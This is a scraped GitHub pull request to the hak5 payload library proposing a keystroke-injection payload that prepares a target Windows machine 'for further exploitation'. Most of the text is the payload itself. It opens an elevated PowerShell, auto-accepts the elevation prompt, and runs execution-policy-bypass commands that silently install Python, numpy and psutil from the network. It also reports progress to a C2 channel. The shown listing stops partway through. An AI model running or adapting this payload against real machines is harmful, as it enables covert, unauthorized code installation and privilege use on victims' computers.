payloads/library/general/insyall_py3/payload.sh#71
Open
choox2738 wants to merge 2 commits intohak5:masterfrom
Open
payloads/library/general/insyall_py3/payload.sh#71choox2738 wants to merge 2 commits intohak5:masterfrom
choox2738 wants to merge 2 commits intohak5:masterfrom
Conversation
Installs python 3 so you can have it as a way to script exploits etc.
Author
|
please provide any feed back to choox2738@gmail.com |
Author
|
Please direct comments to choox2738@gmail.com |
Author
|
Please direct comments to choox2738@gmail.com |
hak5peaks
requested changes
May 28, 2025
Member
There was a problem hiding this comment.
this is in the wrong directory, please include a directory with your payload name and then payload.sh
payloads/library/general/insyall_py3/payload.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
#Installs python 3 so you can have it as a way to script exploits etc.
/root/udisk/payloads/owned.txt
MATCH Regex: py_
Full Payload Contents
Title: py3 installer
Description: Install python3 for further exploitation.
Author: choox2@choo-serv.info
Date: 09/14/2024
Download and install python3 silently
Determine if 32bit or x64
Determine target name
Target IP
############################################################
MATCH py_
Q LOCK
LED SETUP
Q GUI r
Q DELAY 500
Q STRING powershell
Q CONTROL-SHIFT-ENTER
Q DELAY 2000
Q ALT y
Q DELAY 3000
Q STRING "powershell -NoP -NonI -Exec Bypass winget install python3 --disable-interactivity"
Q ENTER
C2NOTIFY INFO 'Python installation should be starting now'
Wait two minutes for python install to complete.two minutes is educated guess. 120,000 milliseconds and
set our LED status to attack
Q LED ATTACK
UNLOCK
DELAY 120000
############################################################
Next we use pip to install numpy
Q LOCK
LED STAGE2
Q GUI r
Q DELAY 500
Q STRING powershell
Q CONTROL-SHIFT-ENTER
Q DELAY 2000
Q ALT y
Q DELAY 3000
Q STRING "powershell -NoP -NonI -Exec Bypass pip install numpy"
Q ENTER
UNLOCK
C2NOTIFY INFO 'numpy installation should be starting now'
############################################################
Next we use pip to install psutil
Q LOCK
LED STAGE3